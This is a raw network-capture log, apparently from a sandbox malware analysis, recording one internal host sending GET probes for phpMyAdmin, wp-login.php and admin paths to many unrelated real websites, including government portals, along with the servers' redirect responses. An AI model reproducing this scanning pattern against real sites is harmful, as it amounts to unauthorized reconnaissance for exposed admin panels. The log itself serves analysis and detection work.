Feb 5, 2024 12:16:11.582909107 CET  88                 IN         HTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


Session ID  Source IP    Source Port  Destination IP   Destination Port
511         192.168.2.6  65361        31.216.144.5     80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.372178078 CET  168                OUT        GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.572525978 CET  195                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://mega.nz
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400


Session ID  Source IP    Source Port  Destination IP   Destination Port
512         192.168.2.6  65343        188.212.100.154  80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.372421980 CET  172                OUT        GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.606343985 CET | 1030 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 795
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:17:37 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://zarkana2.ro/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
513 | 192.168.2.6 | 65389 | 104.18.41.153 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.373697042 CET | 172 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.515626907 CET | 311 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 17
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://app.plex.tv/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd63697f69fb-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Moved Permanently


Session ID | Source IP | Source Port | Destination IP | Destination Port
514 | 192.168.2.6 | 65371 | 34.250.93.112 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.374129057 CET | 168 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: kwyk.fr
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.575838089 CET | 409 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.kwyk.fr/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
515 | 192.168.2.6 | 65370 | 185.120.71.24 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.374212027 CET | 174 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.583933115 CET | 382 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: http://www.analvids.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
516 | 192.168.2.6 | 65372 | 138.66.39.205 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.375200987 CET | 184 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.607443094 CET120INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://login2.innova.puglia.it/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
517 | 192.168.2.6 | 65419 | 3.161.150.69 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.387649059 CET | 180 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: account.booking.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.489934921 CET | 580 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://account.booking.com/PhpMyAdmin/
X-Cache: Redirect from cloudfront
Via: 1.1 cf815e48514b90d59fa790be38ee8ffc.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P5
X-Amz-Cf-Id: RcTMoS-r4bNl0AASdMoC38HjSJamCuX8ZCG6LJVy1Tlolva8cogh_A==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
518 | 192.168.2.6 | 65418 | 44.199.96.179 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.400068045 CET | 180 | OUT | GET /admin.php HTTP/1.1
Host: pxndx-mcr.boletia.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.520560980 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Server: nginx/1.12.2
Location: https://pxndx-mcr.boletia.com/admin.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
519 | 192.168.2.6 | 65342 | 36.255.71.45 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.430507898 CET | 177 | OUT | GET /wp-login.php HTTP/1.1
Host: instructory.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.812014103 CET | 151 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:16:15 GMT
content-length: 0
location: https://instructory.net/wp-login.php
cache-control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port
520 | 192.168.2.6 | 65453 | 142.250.105.84 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.466193914 CET | 180 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.589400053 CET | 485 | IN | HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:11 GMT
Location: https://accounts.google.com/PhpMyAdmin/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 184
Server: GSE


Session ID  Source IP    Source Port  Destination IP  Destination Port
521         192.168.2.6  65452        170.114.52.4    80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.478733063 CET  170                OUT        GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.638727903 CET  1018               IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://us04web.zoom.us/admin
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=qAyyVUMtN.VwwaJ3DSunEJzUejWU4vbQ3oi8vft7Zmk-1707131771-1-AUpaUHNP7XBH7VoYl7WtbTOFNZTDujAHBqvdFHtA2TvZkyao3SyXavbmho30yF0TtYC7avtf6LVm95z/tp5urOI=; path=/; expires=Mon, 05-Feb-24 11:46:11 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Uk4kAKmfQfxa5qBfpcBSiRF2ggTdoKpFC9bowkFHC%2BaQIK1W9q0HP1CFApncNCtEU2dbKHEpl5rknW1f64Ao5%2FiL1eRgwh6TJk%2FJ%2F%2B26yks2IjQL0WnN0hDkQvVt0yLb9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd641b0244df-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
522         192.168.2.6  65483        44.195.133.145  80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.479032993 CET  177                OUT        GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.594872952 CET  580                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE08EBDD9B7BE8AFE3F88D069A772BAB632F18933680BD0BFD5F16AEC6C3BF27FF;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
523         192.168.2.6  65523        23.4.32.216     80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.482307911 CET  180                OUT        GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.589948893 CET  186                IN         HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://steamcommunity.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive


Session ID  Source IP    Source Port  Destination IP  Destination Port
524         192.168.2.6  65374        185.78.166.130  80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.491625071 CET  204                OUT        GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.838294029 CET  397                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/wp-login.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
525 | 192.168.2.6 | 65494 | 190.202.2.80 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.651849985 CET | 188 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: contribuyente.seniat.gob.ve
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.812891006 CET | 499 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:11 GMT
Server: Oracle-Application-Server-10g
Location: http://contribuyente.seniat.gob.ve/index.htm
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Data Ascii: f8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>The document has moved <A HREF="http://contribuyente.seniat.gob.ve/index.htm">here</A>.<P></BODY></HTML>0
Feb 5, 2024 12:16:12.014967918 CET | 186 | OUT | GET /index.htm HTTP/1.1
Host: contribuyente.seniat.gob.ve
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.175885916 CET | 1160 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:12 GMT
Server: Oracle-Application-Server-10g
Set-Cookie: HttpOnly;Secure
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'self';
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: no-referrer
Clear-Site-Data: cache
X-Frame-Options: DENY, SAMEORIGIN
Feature-Policy: layout-animations 'none'; unoptimized-images 'none'; oversized-images 'none'; sync-script 'none'; sync-xhr 'none'; unsized-media 'none';
X-XSS-Protection: 1; mode=block
Expect-CT: enforce; max-age=43200
Public-Key-Pins: none
Last-Modified: Mon, 15 May 2023 15:21:36 GMT
ETag: "11fc95-2dd-64624e00"
Accept-Ranges: bytes
Content-Length: 733
Content-Type: text/html
Data Ascii: <HTML>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->... Mirrored from www.seniat.gob.ve/ by HTTrack Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT -->... Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=iso-8859-1" />... /Added by HTTrack --><HEAD><TITLE>Page has moved</TITLE></HEA
Feb 5, 2024 12:16:12.175900936 CET | 300 | IN | Data Ascii: D><BODY><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://declaraciones.seniat.gob.ve"><A HREF="http://declaraciones.seniat.gob.ve"><B>Cargando Portal...</B></A></BODY>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->
Feb 5, 2024 12:16:12.175915003 CET | 71 | IN | Data Ascii: e Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT --></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
526 | 192.168.2.6 | 65499 | 186.113.7.204 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.652157068 CET | 188 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: oferta.senasofiaplus.edu.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.837270021 CET | 151 | IN | HTTP/1.0 302 Moved Temporarily
Location: https://oferta.senasofiaplus.edu.co/PhpMyAdmin/
Server: BigIP
Connection: Keep-Alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
527 | 192.168.2.6 | 49290 | 195.85.23.95 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.652203083 CET | 177 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.878709078 CET | 756 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
location: https://ro.bongacams.com/PhpMyAdmin
x-bc: ded6941
x-zone: 3-ded6941-web19
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=sPlAOmI.SbF_K0Yty9SLocQQuQdWvCM6UlqNiDKSrHQ-1707131771-1-AZvJvOdJHH+VSfQDYfBdRd41atdb1A/vcpLWtYycbqzt0xc3vhWXbndMTivUeKm3/bUkXK+WsVKIU5M1CWciaxI=; path=/; expires=Mon, 05-Feb-24 11:46:11 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6529d1ad94-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
528 | 192.168.2.6 | 65498 | 31.216.144.5 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.652276993 CET | 162 | OUT | GET /admin HTTP/1.1
Host: mega.nz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.853646040 CET | 195 | IN | HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location: https://mega.nz
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
529 | 192.168.2.6 | 65100 | 104.21.5.25 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.692106962 CET | 173 | OUT | GET /admin.php HTTP/1.1
Host: opsu.terna.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.816540956 CET | 697 | IN | HTTP/1.1 307 Temporary Redirect
Date: Mon, 05 Feb 2024 11:16:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Location: https://terna.net
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBn9LzKfDcASzkCAwIpy7KhjHmATSTB3mFCOQboQEVmdwM9NGIMeNl6zQgIjhdx0rDAGmGZ4F4zUr0kXQKexGz0JvrX0LMFfE5YS7t6jD%2F%2BS4let8L%2FBIt6WEbucybTS8w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd656a6e0701-ATL
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
530 | 192.168.2.6 | 65020 | 41.33.126.100 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.695605040 CET | 174 | OUT | GET /admin HTTP/1.1
Host: student.emis.gov.eg
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.948928118 CET | 137 | IN | HTTP/1.0 302 Moved Temporarily
Location: https://student.emis.gov.eg/admin
Server: BigIP
Connection: Keep-Alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
531 | 192.168.2.6 | 49249 | 177.74.1.157 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.707354069 CET | 179 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: sistemas.pa.gov.br
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.986460924 CET | 116 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache
Content-length: 0
Location: https://sistemas.pa.gov.br/phpMyAdmin/


Session ID | Source IP | Source Port | Destination IP | Destination Port
532 | 192.168.2.6 | 65448 | 185.78.166.130 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.708101034 CET | 203 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.060455084 CET | 396 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
533 | 192.168.2.6 | 65112 | 185.51.191.48 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.727039099 CET | 180 | OUT | GET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.990206003 CET | 239 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/w
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
Feb 5, 2024 12:16:11.995070934 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
